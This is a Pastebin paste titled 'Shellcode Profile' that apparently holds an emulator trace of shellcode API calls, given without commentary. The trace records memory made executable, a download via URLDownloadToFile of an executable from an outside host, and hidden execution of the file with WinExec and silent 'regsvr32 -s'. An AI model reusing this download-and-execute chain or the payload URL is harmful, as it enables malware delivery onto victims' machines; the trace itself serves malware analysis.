SHARE
TWEET

Untitled

a guest Dec 19th, 2012 89 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. [Shellcode Profile]
  2.  
  3. BOOL VirtualProtectEx (
  4.      HANDLE = 0x03d8f2e0 =>
  5.          none;
  6.      LPCVOID = 0x03d8f3a0 =>
  7.          none;
  8.      DWORD dwSize = 255;
  9.      DWORD flNewProtect = 64;
  10.      PDWORD lpflOldProtectt = 64;
  11. ) =  0x1;
  12. HMODULE LoadLibraryA (
  13.      LPCTSTR = 0x03d8f730 =>
  14.            = "urlmon";
  15. ) =  0x7df20000;
  16. DWORD GetTempPathA (
  17.      DWORD nBufferLength = 248;
  18.      LPTSTR = 0x03d8f9e0 =>
  19.            = "c:\tmp\";
  20. ) =  0x7;
  21. HRESULT URLDownloadToFile (
  22.      LPUNKNOWN = 0x03d8fcb0 =>
  23.          none;
  24.      LPCTSTR = 0x03d8fd70 =>
  25.            = "http://frequent.dwyane-wade.org/news/opinion-toss9.exe";
  26.      LPCTSTR = 0x03d8feb0 =>
  27.            = "c:\tmp\wpbt0.dll";
  28.      DWORD dwReserved = 0;
  29.      LPBINDSTATUSCALLBACK lpfnCB = 0;
  30. ) =  0x0;
  31. UINT WINAPI WinExec (
  32.      LPCSTR = 0x03d90180 =>
  33.            = "c:\tmp\wpbt0.dll";
  34.      UINT uCmdShow = 0;
  35. ) =  0x20;
  36. UINT WINAPI WinExec (
  37.      LPCSTR = 0x03d90440 =>
  38.            = "regsvr32 -s c:\tmp\wpbt0.dll";
  39.      UINT uCmdShow = 0;
  40. ) =  0x20;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top